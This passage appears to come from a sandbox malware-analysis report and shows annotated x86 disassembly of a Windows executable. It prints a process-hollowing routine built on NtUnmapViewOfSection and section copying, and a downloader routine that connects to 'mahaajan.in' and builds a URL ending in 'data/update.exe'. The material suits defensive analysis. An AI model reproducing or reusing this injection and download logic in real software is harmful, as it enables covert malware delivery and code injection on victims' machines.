00414928 mov dword ptr [0042B3DCh], eax
0041492D push 00414C1Ch ASCII "getprotobynumber"
00414932 mov eax, dword ptr [ebx]
00414934 push eax
00414935 call 004061D4h
0041493A mov dword ptr [0042B3E0h], eax
0041493F push 00414C30h ASCII "getservbyname"
00414944 mov eax, dword ptr [ebx]
00414946 push eax
00414947 call 004061D4h
0041494C mov dword ptr [0042B3D4h], eax
00414951 push 00414C40h ASCII "getservbyport"
00414956 mov eax, dword ptr [ebx]
00414958 push eax
00414959 call 004061D4h
0041495E mov dword ptr [0042B3D8h], eax
00414963 push 00414C50h ASCII "gethostname"
00414968 mov eax, dword ptr [ebx]
0041496A push eax
0041496B call 004061D4h
00414970 mov dword ptr [0042B3ECh], eax
00414975 push 00414C5Ch ASCII "getaddrinfo"
0041497A mov eax, dword ptr [ebx]
0041497C push eax
0041497D call 004061D4h
00414982 mov dword ptr [0042B44Ch], eax
00414987 push 00414C68h ASCII "freeaddrinfo"
0041498C mov eax, dword ptr [ebx]
0041498E push eax
0041498F call 004061D4h
00414994 mov dword ptr [0042B450h], eax
00414999 push 00414C78h ASCII "getnameinfo"
0041499E mov eax, dword ptr [ebx]
004149A0 push eax
004149A1 call 004061D4h
004149A6 mov dword ptr [0042B454h], eax
004149AB cmp dword ptr [0042B44Ch], 00000000h
004149B2 je 004149C6h
004149B4 cmp dword ptr [0042B450h], 00000000h
004149BB je 004149C6h
004149BD cmp dword ptr [0042B454h], 00000000h
004149C4 jne 004149CAh
004149C6 xor eax, eax xrefs 004149B2, 004149BB
004149C8 jmp 004149CCh
004149CA mov al, 01h xrefs 004149C4
004149CC mov byte ptr [0042C8A8h], al xrefs 004149C8
004149D1 cmp byte ptr [0042C8A8h], 00000000h
004149D8 jne 00414A57h
004149DA push 00414C84h ASCII "wship6.dll"
004149DF call 00406244h
004149E4 mov dword ptr [0042B468h], eax
004149E9 cmp dword ptr [0042B468h], 00000000h
004149F0 je 00414A57h
004149F2 push 00414C5Ch ASCII "getaddrinfo"
004149F7 mov eax, dword ptr [0042B468h] 00000000
004149FC push eax
004149FD call 004061D4h
00414A02 mov dword ptr [0042B44Ch], eax
00414A07 push 00414C68h ASCII "freeaddrinfo"
00414A0C mov eax, dword ptr [0042B468h] 00000000
00414A11 push eax
00414A12 call 004061D4h
00414A17 mov dword ptr [0042B450h], eax
00414A1C push 00414C78h ASCII "getnameinfo"
00414A21 mov eax, dword ptr [0042B468h] 00000000
00414A26 push eax
00414A27 call 004061D4h
00414A2C mov dword ptr [0042B454h], eax
00414A31 cmp dword ptr [0042B44Ch], 00000000h
00414A38 je 00414A4Ch
00414A3A cmp dword ptr [0042B450h], 00000000h
00414A41 je 00414A4Ch
00414A43 cmp dword ptr [0042B454h], 00000000h
00414A4A jne 00414A50h
00414A4C xor eax, eax xrefs 00414A38, 00414A41
00414A4E jmp 00414A52h
00414A50 mov al, 01h xrefs 00414A4A
00414A52 mov byte ptr [0042C8A9h], al xrefs 00414A4E
00414A57 mov byte ptr [ebp-05h], 00000001h xrefs 004149D8, 004149F0
00414A5B jmp 00414A61h
00414A5D mov byte ptr [ebp-05h], 00000001h xrefs 004146D2
00414A61 cmp byte ptr [ebp-05h], 00000000h xrefs 004146F9, 00414A5B
00414A65 je 00414A6Dh
00414A67 inc dword ptr [0042B460h]
00414A6D xor eax, eax xrefs 00414A65
00414A6F pop edx
00414A71 pop ecx Count = 2
00414A72 mov dword ptr fs:[eax], edx
00414A75 push 00414A8Ch
00414A7A mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00414A8A
00414A7F call 0041391Ch
00414A84 ret function end
Function 00401A08, API count: 4, instr count: 48
APIs
  • InitializeCriticalSection.KERNEL32, ref: 00401A1E
  • RtlEnterCriticalSection.NTDLL, ref: 00401A31
  • LocalAlloc.KERNEL32, ref: 00401A5B
  • RtlLeaveCriticalSection.NTDLL, ref: 00401AB8
Address Instruction Meta Information
00401A08 push ebp xrefs 0040229D, 00402108, 00402618
00401A09 mov ebp, esp
00401A0B xor edx, edx
00401A0D push ebp
00401A0E push 00401ABEh
00401A13 push dword ptr fs:[edx]
00401A16 mov dword ptr fs:[edx], esp
00401A19 push 0042C5C4h
00401A1E call 0040135Ch InitializeCriticalSection@KERNEL32.DLL (Hidden Import)
00401A23 cmp byte ptr [0042C045h], 00000000h
00401A2A je 00401A36h
00401A2C push 0042C5C4h
00401A31 call 00401364h RtlEnterCriticalSection@NTDLL.DLL (Hidden Import)
00401A36 mov eax, 0042C5E4h xrefs 00401A2A
00401A3B call 004013CCh
00401A40 mov eax, 0042C5F4h
00401A45 call 004013CCh
00401A4A mov eax, 0042C620h
00401A4F call 004013CCh
00401A54 push 00000FF8h
00401A59 push 00000000h
00401A5B call 0040133Ch LocalAlloc@KERNEL32.DLL (Hidden Import)
00401A60 mov dword ptr [0042C61Ch], eax
00401A65 cmp dword ptr [0042C61Ch], 00000000h
00401A6C je 00401A9Dh
00401A6E mov eax, 00000003h
00401A73 mov edx, dword ptr [0042C61Ch] 00000000 xrefs 00401A85
00401A79 xor ecx, ecx
00401A7B mov dword ptr [edx+eax*4-0Ch], ecx
00401A7F inc eax
00401A80 cmp eax, 00000401h
00401A85 jne 00401A73h
00401A87 mov eax, 0042C604h
00401A8C mov dword ptr [eax+04h], eax
00401A8F mov dword ptr [eax], eax
00401A91 mov dword ptr [0042C610h], eax
00401A96 mov byte ptr [0042C5BCh], 00000001h
00401A9D xor eax, eax xrefs 00401A6C
00401A9F pop edx
00401AA1 pop ecx Count = 2
00401AA2 mov dword ptr fs:[eax], edx
00401AA5 push 00401AC5h
00401AAA cmp byte ptr [0042C045h], 00000000h xrefs 00401AC3
00401AB1 je 00401ABDh
00401AB3 push 0042C5C4h
00401AB8 call 0040136Ch RtlLeaveCriticalSection@NTDLL.DLL (Hidden Import)
00401ABD ret xrefs 00401AB1 function end
Function 0041F410, API count: 0, instr count: 8
Address Instruction Meta Information
0041F410 push ebx xrefs 0041F48B, 0041F497, 0041F4A8
0041F411 mov ebx, eax
0041F413 mov eax, ebx
0041F415 call 00404878h
0041F41A push eax
0041F41B call 00406244h
0041F420 pop ebx
0041F421 ret function end
Non-executed Functions
Function 004160F5, API count: 1, instr count: 19
APIs
    • HeapFree.KERNEL32, ref: 004162F8
  • CloseHandle.KERNEL32, ref: 0041610D
Address Instruction Meta Information
004160F5 mov eax, dword ptr [esp+04h] xrefs 004155D9, 00415496
004160F9 push esi
004160FA mov esi, dword ptr [eax]
004160FC push eax
004160FD call 004162ECh
00416102 cmp esi, FFFFFFFFh
00416105 pop ecx
00416106 jne 0041610Ch
00416108 xor eax, eax
0041610A pop esi
0041610B ret function end
0041610C push esi xrefs 00416106
0041610D call dword ptr [00401004h] CloseHandle@KERNEL32.DLL (Import)
00416113 neg eax
00416115 sbb eax, eax
00416117 neg eax
00416119 dec eax
0041611A pop esi
0041611B ret function end
Function 00414290, API count: 1, instr count: 135
APIs
  • NtUnmapViewOfSection.NTDLL, ref: 0041430D
Address Instruction Meta Information
00414290 push ebp xrefs 004149BA
00414291 mov ebp, esp
00414293 sub esp, 00000348h
00414299 lea eax, dword ptr [ebp-00000340h]
0041429F push eax
004142A0 call 00414430h
004142A5 push eax
004142A6 call 00414450h
004142AB lea ecx, dword ptr [ebp-58h]
004142AE push ecx
004142AF call 00414470h
004142B4 mov edx, dword ptr [ebp+0Ch]
004142B7 mov dword ptr [ebp-68h], edx
004142BA mov eax, dword ptr [ebp-68h]
004142BD mov dword ptr [ebp-00000344h], eax
004142C3 mov ecx, dword ptr [ebp-00000344h]
004142C9 mov edx, dword ptr [ebp-68h]
004142CC add edx, dword ptr [ecx+3Ch]
004142CF mov dword ptr [ebp-64h], edx
004142D2 mov eax, dword ptr [ebp-64h]
004142D5 mov ecx, dword ptr [eax+34h]
004142D8 mov dword ptr [ebp-5Ch], ecx
004142DB mov edx, dword ptr [ebp-64h]
004142DE mov eax, dword ptr [edx+28h]
004142E1 mov dword ptr [ebp-6Ch], eax
004142E4 lea ecx, dword ptr [ebp-10h]
004142E7 push ecx
004142E8 lea edx, dword ptr [ebp-58h]
004142EB push edx
004142EE push 00000000h Count = 2
004142F0 push 00000024h
004142F6 push 00000000h Count = 3
004142F8 call 00414490h
004142FD push eax
004142FE push 00000000h
00414300 call 004144B0h
00414305 mov eax, dword ptr [ebp-5Ch]
00414308 push eax
00414309 mov ecx, dword ptr [ebp-10h]
0041430C push ecx
0041430D call dword ptr [00401070h] NtUnmapViewOfSection@NTDLL.DLL (Import)
00414313 push 00000004h
00414315 push 00003000h
0041431A mov edx, dword ptr [ebp-64h]
0041431D mov eax, dword ptr [edx+50h]
00414320 push eax
00414321 mov ecx, dword ptr [ebp-5Ch]
00414324 push ecx
00414325 mov edx, dword ptr [ebp-10h]
00414328 push edx
00414329 call 004144F0h
0041432E push 00000000h
00414330 mov eax, dword ptr [ebp-64h]
00414333 mov ecx, dword ptr [eax+54h]
00414336 push ecx
00414337 mov edx, dword ptr [ebp-68h]
0041433A push edx
0041433B mov eax, dword ptr [ebp-5Ch]
0041433E push eax
0041433F mov ecx, dword ptr [ebp-10h]
00414342 push ecx
00414343 call 00414520h
00414348 mov dword ptr [ebp-00000348h], 00000000h
00414352 jmp 00414363h
00414354 mov edx, dword ptr [ebp-00000348h] xrefs 004143B9
0041435A add edx, 01h
0041435D mov dword ptr [ebp-00000348h], edx
00414363 mov eax, dword ptr [ebp-64h] xrefs 00414352
00414366 movzx ecx, word ptr [eax+06h]
0041436A cmp dword ptr [ebp-00000348h], ecx
00414370 jnl 004143BBh
00414372 mov edx, dword ptr [ebp-00000344h]
00414378 mov eax, dword ptr [edx+3Ch]
0041437B mov ecx, dword ptr [ebp-68h]
0041437E lea edx, dword ptr [ecx+eax+000000F8h]
00414385 mov eax, dword ptr [ebp-00000348h]
0041438B imul eax, eax, 28h
0041438E add edx, eax
00414390 mov dword ptr [ebp-60h], edx
00414393 push 00000000h
00414395 mov ecx, dword ptr [ebp-60h]
00414398 mov edx, dword ptr [ecx+10h]
0041439B push edx
0041439C mov eax, dword ptr [ebp-60h]
0041439F mov ecx, dword ptr [ebp-68h]
004143A2 add ecx, dword ptr [eax+14h]
004143A5 push ecx
004143A6 mov edx, dword ptr [ebp-60h]
004143A9 mov eax, dword ptr [ebp-5Ch]
004143AC add eax, dword ptr [edx+0Ch]
004143AF push eax
004143B0 mov ecx, dword ptr [ebp-10h]
004143B3 push ecx
004143B4 call 00414520h
004143B9 jmp 00414354h
004143BB mov dword ptr [ebp-00000340h], 00010002h xrefs 00414370
004143C5 lea edx, dword ptr [ebp-00000340h]
004143CB push edx
004143CC mov eax, dword ptr [ebp-0Ch]
004143CF push eax
004143D0 call 00414450h
004143D5 push 00000000h
004143D7 push 00000004h
004143D9 lea ecx, dword ptr [ebp-5Ch]
004143DC push ecx
004143DD mov edx, dword ptr [ebp-0000029Ch]
004143E3 add edx, 08h
004143E6 push edx
004143E7 mov eax, dword ptr [ebp-10h]
004143EA push eax
004143EB call 00414520h
004143F0 mov ecx, dword ptr [ebp-5Ch]
004143F3 add ecx, dword ptr [ebp-6Ch]
004143F6 mov dword ptr [ebp-00000290h], ecx
004143FC lea edx, dword ptr [ebp-00000340h]
00414402 push edx
00414403 mov eax, dword ptr [ebp-0Ch]
00414406 push eax
00414407 call 00414550h
0041440C mov ecx, dword ptr [ebp-0Ch]
0041440F push ecx
00414410 call 00414570h
00414415 mov edx, dword ptr [ebp-68h]
00414418 push edx
00414419 call 00413F70h
0041441E push FFFFFFFFh
00414420 mov eax, dword ptr [ebp-10h]
00414423 push eax
00414424 call 00414590h
00414429 mov esp, ebp
0041442B pop ebp
0041442C ret function end
Function 0041609B, API count: 1, instr count: 6
APIs
  • DeleteFileA.KERNEL32, ref: 0041609F
Address Instruction Meta Information
0041609B push dword ptr [esp+04h] xrefs 004155FD, 004154BA
0041609F call dword ptr [0040102Ch] DeleteFileA@KERNEL32.DLL (Import)
004160A5 neg eax
004160A7 sbb eax, eax
004160A9 inc eax
004160AA ret function end
Function 00415FF2, API count: 1, instr count: 5
APIs
  • HeapAlloc.KERNEL32, ref: 00415FFE
Address Instruction Meta Information
00415FF2 push dword ptr [esp+04h] xrefs 004145B9, 0041624E
00415FF6 push 00000000h
00415FF8 push dword ptr [00418CE0h]
00415FFE call dword ptr [00401000h] HeapAlloc@KERNEL32.DLL (Import)
00416004 ret function end
Function 004162FF, API count: 1, instr count: 13
APIs
  • ExitProcess.KERNEL32, ref: 0041632D
Address Instruction Meta Information
004162FF call 0041635Bh xrefs 004161EA
00416304 push 00000000h
00416306 push 00401090h
0041630B push 0040108Ch
00416310 call 00416334h
00416315 push 00000000h
00416317 push 00401098h
0041631C push 00401094h
00416321 call 00416334h
00416326 add esp, 18h
00416329 push dword ptr [esp+04h]
0041632D call dword ptr [0040101Ch] ExitProcess@KERNEL32.DLL (Import)
00416333 int3
Function 004160BE, API count: 1, instr count: 18
APIs
    • WriteFile.KERNEL32, ref: 004162D0
  • wvsprintfA.USER32, ref: 004160DC
Address Instruction Meta Information
004160BE push ebp xrefs 004155CA, 0041548A
004160BF mov ebp, esp
004160C1 sub esp, 00000400h
004160C7 lea eax, dword ptr [ebp+10h]
004160CA push eax
004160CB push dword ptr [ebp+0Ch]
004160CE lea eax, dword ptr [ebp-00000400h]
004160D4 push eax
004160D5 mov byte ptr [ebp-00000400h], 00000000h
004160DC call dword ptr [00401034h] wvsprintfA@USER32.DLL (Import)
004160E2 push dword ptr [ebp+08h]
004160E5 lea eax, dword ptr [ebp-00000400h]
004160EB push eax
004160EC call 004162AFh
004160F2 pop ecx Count = 2
004160F3 leave
004160F4 ret function end
Function 0041611C, API count: 4, instr count: 82
APIs
    • ExitProcess.KERNEL32, ref: 0041632D
  • ExitProcess.KERNEL32, ref: 0041614F
  • GetCommandLineA.KERNEL32, ref: 0041616A
  • GetStartupInfoA.KERNEL32, ref: 004161B3
  • GetModuleHandleA.KERNEL32, ref: 004161DD
Address Instruction Meta Information
0041611C push ebp
0041611D mov ebp, esp
0041611F sub esp, 44h
00416122 mov eax, dword ptr [00418CE4h] 00000000
00416127 test eax, eax
00416129 je 00416135h
0041612B call eax
0041612D test eax, eax
0041612F jne 00416135h
00416131 push FFFFFFFEh
00416133 jmp 0041614Fh
00416135 push 00000001h xrefs 00416129, 0041612F
00416137 push 00401088h
0041613C push 00401080h
00416141 call 00416334h
00416146 add esp, 0Ch
00416149 test eax, eax
0041614B je 00416155h
0041614D push FFFFFFFDh
0041614F call dword ptr [0040101Ch] ExitProcess@KERNEL32.DLL (Import) xrefs 00416133
00416155 push esi xrefs 0041614B
00416156 push 00000000h
00416158 push 0040107Ch
0041615D push 00401078h
00416162 call 00416334h
00416167 add esp, 0Ch
0041616A call dword ptr [00401020h] GetCommandLineA@KERNEL32.DLL (Import)
00416170 mov esi, eax
00416172 test esi, esi
00416174 jne 0041617Bh
00416176 mov esi, 00411970h
0041617B mov cl, 20h xrefs 00416174
0041617D jmp 00416184h
0041617F cmp al, 20h xrefs 00416188
00416181 jnbe 0041618Eh
00416183 inc esi
00416184 mov al, byte ptr [esi] xrefs 0041617D
00416186 test al, al
00416188 jne 0041617Fh
0041618A cmp al, 20h
0041618C jbe 004161A5h
0041618E mov al, byte ptr [esi] xrefs 00416181
00416190 cmp al, 22h xrefs 0041619C
00416192 jne 00416197h
00416194 xor cl, 00000020h
00416197 inc esi xrefs 00416192
00416198 mov al, byte ptr [esi]
0041619A cmp al, cl
0041619C jnbe 00416190h
0041619E jmp 004161A5h
004161A0 cmp al, cl xrefs 004161A9
004161A2 jnbe 004161ABh
004161A4 inc esi
004161A5 mov al, byte ptr [esi] xrefs 0041619E, 0041618C
004161A7 test al, al
004161A9 jne 004161A0h
004161AB and dword ptr [ebp-18h], 00000000h xrefs 004161A2
004161AF lea eax, dword ptr [ebp-44h]
004161B2 push eax
004161B3 call dword ptr [00401024h] GetStartupInfoA@KERNEL32.DLL (Import)
004161B9 test eax, 0A0D0A0Dh
004161BE sub eax, 54524357h
004161C3 sub eax, 0A0D0A0Dh
004161C8 test byte ptr [ebp-18h], 00000001h
004161CC je 004161D4h
004161CE movzx eax, word ptr [ebp-14h]
004161D2 jmp 004161D7h
004161D4 push 0000000Ah xrefs 004161CC
004161D6 pop eax
004161D7 push eax xrefs 004161D2
004161D8 push esi
004161DB push 00000000h Count = 2
004161DD call dword ptr [00401028h] GetModuleHandleA@KERNEL32.DLL (Import)
004161E3 push eax
004161E4 call 004147E0h
004161E9 push eax
004161EA call 004162FFh
004161EF pop ecx
004161F0 pop esi
004161F1 leave
004161F2 ret function end
Function 004161F3, API count: 1, instr count: 7
APIs
  • GetProcessHeap.KERNEL32, ref: 004161F3
Address Instruction Meta Information
004161F3 call dword ptr [00401018h] GetProcessHeap@KERNEL32.DLL (Import)
004161F9 xor ecx, ecx
004161FB test eax, eax
004161FD sete cl
00416200 mov dword ptr [00418CE0h], eax
00416205 mov eax, ecx
00416207 ret function end
Function 00414BA0, API count: 10, instr count: 62
APIs
  • #115.WS2_32, ref: 00414BB5
  • WSASocketA.WS2_32, ref: 00414BC7
  • #116.WS2_32, ref: 00414BDC
  • #52.WS2_32, ref: 00414BEE
  • #116.WS2_32, ref: 00414C03
  • #9.WS2_32, ref: 00414C10
  • #12.WS2_32, ref: 00414C37
  • #11.WS2_32, ref: 00414C3E
  • WSAConnect.WS2_32, ref: 00414C62
  • #116.WS2_32, ref: 00414C6D
Address Instruction Meta Information
00414BA0 push ebp xrefs 00414DF0
00414BA1 mov ebp, esp
00414BA3 sub esp, 000001A8h
00414BA9 lea eax, dword ptr [ebp-00000190h]
00414BAF push eax
00414BB0 push 00000202h
00414BB5 call dword ptr [00401048h] #115@WS2_32.DLL (Import)
00414BBF push 00000000h Count = 3
00414BC1 push 00000006h
00414BC3 push 00000001h
00414BC5 push 00000002h
00414BC7 call dword ptr [00401068h] WSASocketA@WS2_32.DLL (Import)
00414BCD mov dword ptr [ebp-00000194h], eax
00414BD3 cmp dword ptr [ebp-00000194h], FFFFFFFFh
00414BDA jne 00414BEAh
00414BDC call dword ptr [00401058h] #116@WS2_32.DLL (Import)
00414BE2 or eax, FFFFFFFFh
00414BE5 jmp 00414C7Eh
00414BEA mov ecx, dword ptr [ebp+08h] xrefs 00414BDA
00414BED push ecx
00414BEE call dword ptr [00401060h] #52@WS2_32.DLL (Import)
00414BF4 mov dword ptr [ebp-00000198h], eax
00414BFA cmp dword ptr [ebp-00000198h], 00000000h
00414C01 jne 00414C0Eh
00414C03 call dword ptr [00401058h] #116@WS2_32.DLL (Import)
00414C09 or eax, FFFFFFFFh
00414C0C jmp 00414C7Eh
00414C0E push 00000050h xrefs 00414C01
00414C10 call dword ptr [00401054h] #9@WS2_32.DLL (Import)
00414C16 mov word ptr [ebp-000001A6h], ax
00414C1D mov edx, 00000002h
00414C22 mov word ptr [ebp-000001A8h], dx
00414C29 mov eax, dword ptr [ebp-00000198h]
00414C2F mov ecx, dword ptr [eax+0Ch]
00414C32 mov edx, dword ptr [ecx]
00414C34 mov eax, dword ptr [edx]
00414C36 push eax
00414C37 call dword ptr [00401044h] #12@WS2_32.DLL (Import)
00414C3D push eax
00414C3E call dword ptr [0040104Ch] #11@WS2_32.DLL (Import)
00414C44 mov dword ptr [ebp-000001A4h], eax
00414C50 push 00000000h Count = 4
00414C52 push 00000010h
00414C54 lea ecx, dword ptr [ebp-000001A8h]
00414C5A push ecx
00414C5B mov edx, dword ptr [ebp-00000194h]
00414C61 push edx
00414C62 call dword ptr [00401050h] WSAConnect@WS2_32.DLL (Import)
00414C68 cmp eax, FFFFFFFFh
00414C6B jne 00414C78h
00414C6D call dword ptr [00401058h] #116@WS2_32.DLL (Import)
00414C73 or eax, FFFFFFFFh
00414C76 jmp 00414C7Eh
00414C78 mov eax, dword ptr [ebp-00000194h] xrefs 00414C6B
00414C7E mov esp, ebp xrefs 00414C76, 00414C0C, 00414BE5
00414C80 pop ebp
00414C81 ret function end
Function 00414B80, API count: 1, instr count: 13
APIs
  • InternetGetConnectedState.WININET, ref: 00414B8A
Address Instruction Meta Information
00414B80 push ebp xrefs 0041493D
00414B81 mov ebp, esp
00414B83 push ecx
00414B84 push 00000000h
00414B86 lea eax, dword ptr [ebp-04h]
00414B89 push eax
00414B8A call dword ptr [0040103Ch] InternetGetConnectedState@WININET.DLL (Import)
00414B90 neg eax
00414B92 sbb eax, eax
00414B94 neg eax
00414B96 mov esp, ebp
00414B98 pop ebp
00414B99 ret function end
Function 00416208, API count: 3, instr count: 72
APIs
    • HeapAlloc.KERNEL32, ref: 00415FFE
    • HeapFree.KERNEL32, ref: 004162F8
  • CloseHandle.KERNEL32, ref: 0041621C
  • CreateFileA.KERNEL32, ref: 00416288
  • SetFilePointer.KERNEL32, ref: 004162A1
Address Instruction Meta Information
00416208 push esi xrefs 004160B5
00416209 mov esi, dword ptr [esp+10h]
0041620D push edi
0041620E xor edi, edi
00416210 cmp esi, edi
00416212 je 0041624Ch
00416214 mov eax, dword ptr [esi]
00416216 cmp eax, FFFFFFFFh
00416219 je 00416222h
0041621B push eax
0041621C call dword ptr [00401004h] CloseHandle@KERNEL32.DLL (Import)
00416222 or dword ptr [esi], FFFFFFFFh xrefs 00416258, 00416219
00416225 or dword ptr [esi+04h], FFFFFFFFh
00416229 push ebx
0041622A mov ebx, dword ptr [esp+14h]
0041622E mov al, byte ptr [ebx]
00416230 cmp al, 61h
00416232 mov edx, C0000000h
00416237 je 00416270h
00416239 cmp al, 72h
0041623B je 00416267h
0041623D cmp al, 77h
0041623F je 0041625Eh
00416241 push esi xrefs 00416293
00416242 call 004162ECh
00416247 pop ecx
00416248 xor eax, eax
0041624A jmp 004162ABh
0041624C push 00000008h xrefs 00416212
0041624E call 00415FF2h
00416253 mov esi, eax
00416255 cmp esi, edi
00416257 pop ecx
00416258 jne 00416222h
0041625A xor eax, eax
0041625C jmp 004162ACh
0041625E mov eax, 40000000h xrefs 0041623F
00416263 push 00000002h
00416265 jmp 00416274h
00416267 mov eax, 80000000h xrefs 0041623B
0041626C push 00000003h
0041626E jmp 00416274h
00416270 mov eax, edx xrefs 00416237
00416272 push 00000004h
00416274 cmp byte ptr [ebx+01h], 0000002Bh xrefs 0041626E, 00416265
00416278 pop ecx
00416279 jne 0041627Dh
0041627B mov eax, edx
0041627E push edi Count = 2
0041627F push ecx
00416280 push edi
00416281 push 00000003h
00416283 push eax
00416284 push dword ptr [esp+28h]
00416288 call dword ptr [00401010h] CreateFileA@KERNEL32.DLL (Import)
0041628E mov edi, eax
00416290 cmp edi, FFFFFFFFh
00416293 je 00416241h
00416295 cmp byte ptr [ebx], 00000061h
00416298 jne 004162A7h
0041629A push 00000002h
0041629E push 00000000h Count = 2
004162A0 push edi
004162A1 call dword ptr [00401014h] SetFilePointer@KERNEL32.DLL (Import)
004162A7 mov dword ptr [esi], edi xrefs 00416298
004162A9 mov eax, esi
004162AB pop ebx xrefs 0041624A
004162AC pop edi xrefs 0041625C
004162AD pop esi
004162AE ret function end
Function 004162AF, API count: 1, instr count: 30
APIs
  • WriteFile.KERNEL32, ref: 004162D0
Address Instruction Meta Information
004162AF push ebp xrefs 004160EC
004162B0 mov ebp, esp
004162B2 mov eax, dword ptr [ebp+08h]
004162B5 push esi
004162B6 xor ecx, ecx
004162B8 xor esi, esi
004162BA cmp byte ptr [eax], cl
004162BC je 004162C4h
004162BE inc esi xrefs 004162C2
004162BF cmp byte ptr [esi+eax], cl
004162C2 jne 004162BEh
004162C4 push ecx xrefs 004162BC
004162C5 lea ecx, dword ptr [ebp+08h]
004162C8 push ecx
004162C9 push esi
004162CA push eax
004162CB mov eax, dword ptr [ebp+0Ch]
004162CE push dword ptr [eax]
004162D0 call dword ptr [0040100Ch] WriteFile@KERNEL32.DLL (Import)
004162D6 test eax, eax
004162D8 jne 004162DFh
004162DA or eax, FFFFFFFFh
004162DD jmp 004162E9h
004162DF mov eax, dword ptr [ebp+08h] xrefs 004162D8
004162E2 cmp eax, esi
004162E4 je 004162E9h
004162E6 or eax, FFFFFFFFh
004162E9 pop esi xrefs 004162E4, 004162DD
004162EA pop ebp
004162EB ret function end
Function 004162EC, API count: 1, instr count: 5
APIs
  • HeapFree.KERNEL32, ref: 004162F8
Address Instruction Meta Information
004162EC push dword ptr [esp+04h] xrefs 00416242, 004160FD
004162F0 push 00000000h
004162F2 push dword ptr [00418CE0h]
004162F8 call dword ptr [00401008h] HeapFree@KERNEL32.DLL (Import)
004162FE ret function end
Function 00414DC0, API count: 2, instr count: 134
APIs
    • #115.WS2_32, ref: 00414BB5
    • WSASocketA.WS2_32, ref: 00414BC7
    • #116.WS2_32, ref: 00414BDC
    • #52.WS2_32, ref: 00414BEE
    • #116.WS2_32, ref: 00414C03
    • #9.WS2_32, ref: 00414C10
    • #12.WS2_32, ref: 00414C37
    • #11.WS2_32, ref: 00414C3E
    • WSAConnect.WS2_32, ref: 00414C62
    • #116.WS2_32, ref: 00414C6D
  • #19.WS2_32, ref: 00414E28
  • #16.WS2_32, ref: 00414E50
Strings
  • http://mahaajan.in/dd/, va: 00401118
  • %s %s, va: 00411BCC
  • http://%s%sdata/update.exe, va: 00411BD4
Address Instruction Meta Information
00414DC0 push ebp
00414DC1 mov ebp, esp
00414DC3 mov eax, 00001728h
00414DC8 call 004163B4h
00414DCD call 00414C90h
00414DD2 mov dword ptr [ebp-04h], eax
00414DD5 push 00000400h
00414DDA push 00000000h
00414DDC lea eax, dword ptr [ebp-00000408h]
00414DE2 push eax
00414DE3 call 00415F8Fh
00414DE8 add esp, 0Ch
00414DEB push 00401118h ASCII "http://mahaajan.in/dd/"
00414DF0 call 00414BA0h
00414DF5 add esp, 04h
00414DF8 mov dword ptr [ebp-00000410h], eax
00414DFE cmp dword ptr [ebp-00000410h], FFFFFFFFh
00414E05 jne 00414E0Eh
00414E07 xor eax, eax
00414E09 jmp 00414FD8h
00414E0E push 00000000h xrefs 00414E05
00414E10 mov ecx, dword ptr [ebp-04h]
00414E13 push ecx
00414E14 call 00415EDCh
00414E19 add esp, 04h
00414E1C push eax
00414E1D mov edx, dword ptr [ebp-04h]
00414E20 push edx
00414E21 mov eax, dword ptr [ebp-00000410h]
00414E27 push eax
00414E28 call dword ptr [00401064h] #19@WS2_32.DLL (Import)
00414E2E push 00000000h xrefs 00414EFC
00414E30 push 00000001h
00414E32 lea ecx, dword ptr [ebp-00000408h]
00414E38 push ecx
00414E39 call 00415EDCh
00414E3E add esp, 04h
00414E41 lea edx, dword ptr [ebp+eax-00000408h]
00414E48 push edx
00414E49 mov eax, dword ptr [ebp-00000410h]
00414E4F push eax
00414E50 call dword ptr [0040105Ch] #16@WS2_32.DLL (Import)
00414E56 mov dword ptr [ebp-00000614h], eax
00414E5C cmp dword ptr [ebp-00000614h], 00000000h
00414E63 je 00414F01h
00414E69 mov dword ptr [ebp-00000618h], 00000000h
00414E73 jmp 00414E84h
00414E75 mov ecx, dword ptr [ebp-00000618h] xrefs 00414EF7
00414E7B add ecx, 01h
00414E7E mov dword ptr [ebp-00000618h], ecx
00414E84 mov edx, dword ptr [ebp-00000618h] xrefs 00414E73
00414E8A movsx eax, byte ptr [ebp+edx-00000408h]
00414E92 test eax, eax
00414E94 je 00414EFCh
00414E96 mov ecx, dword ptr [ebp-00000618h]
00414E9C movsx edx, byte ptr [ebp+ecx-00000408h]
00414EA4 cmp edx, 0Dh
00414EA7 jne 00414EF7h
00414EA9 mov eax, dword ptr [ebp-00000618h]
00414EAF movsx ecx, byte ptr [ebp+eax-00000407h]
00414EB7 cmp ecx, 0Ah
00414EBA jne 00414EF7h
00414EBC mov edx, dword ptr [ebp-00000618h]
00414EC2 movsx eax, byte ptr [ebp+edx-00000406h]
00414ECA cmp eax, 0Dh
00414ECD jne 00414EF7h
00414ECF mov ecx, dword ptr [ebp-00000618h]
00414ED5 movsx edx, byte ptr [ebp+ecx-00000405h]
00414EDD cmp edx, 0Ah
00414EE0 jne 00414EF7h
00414EE2 mov eax, dword ptr [ebp-00000618h]
00414EE8 lea ecx, dword ptr [ebp+eax-00000404h]
00414EEF mov dword ptr [ebp-0000040Ch], ecx
00414EF5 jmp 00414EFCh
00414EF7 jmp 00414E75h xrefs 00414EA7, 00414EBA, 00414ECD, 00414EE0
00414EFC jmp 00414E2Eh xrefs 00414E94, 00414EF5
00414F01 push 00411BC4h xrefs 00414E63
00414F06 mov edx, dword ptr [ebp-0000040Ch]
00414F0C push edx
00414F0D call 00416027h
00414F12 add esp, 08h
00414F15 mov dword ptr [ebp-00000610h], eax
00414F1B mov dword ptr [ebp-0000161Ch], 00000001h
00414F25 jmp 00414F36h
00414F27 mov eax, dword ptr [ebp-0000161Ch] xrefs 00414F5B
00414F2D add eax, 01h
00414F30 mov dword ptr [ebp-0000161Ch], eax
00414F36 cmp dword ptr [ebp-0000161Ch], 04h xrefs 00414F25
00414F3D jnc 00414F5Dh
00414F3F push 00411BC8h
00414F44 push 00000000h
00414F46 call 00416027h
00414F4B add esp, 08h
00414F4E mov ecx, dword ptr [ebp-0000161Ch]
00414F54 mov dword ptr [ebp+ecx*4-00000610h], eax
00414F5B jmp 00414F27h
00414F5D mov edx, dword ptr [ebp-0000060Ch] xrefs 00414F3D
00414F63 push edx
00414F64 mov eax, dword ptr [ebp-00000610h]
00414F6A push eax
00414F6B push 00411BCCh ASCII "%s %s"
00414F70 lea ecx, dword ptr [ebp-00001618h]
00414F76 push ecx
00414F77 call 004141C0h
00414F7C add esp, 10h
00414F7F lea edx, dword ptr [ebp-00001618h]
00414F85 push edx
00414F86 call 00414CC0h
00414F8B add esp, 04h
00414F8E movzx eax, al
00414F91 test eax, eax
00414F93 jne 00414FD6h
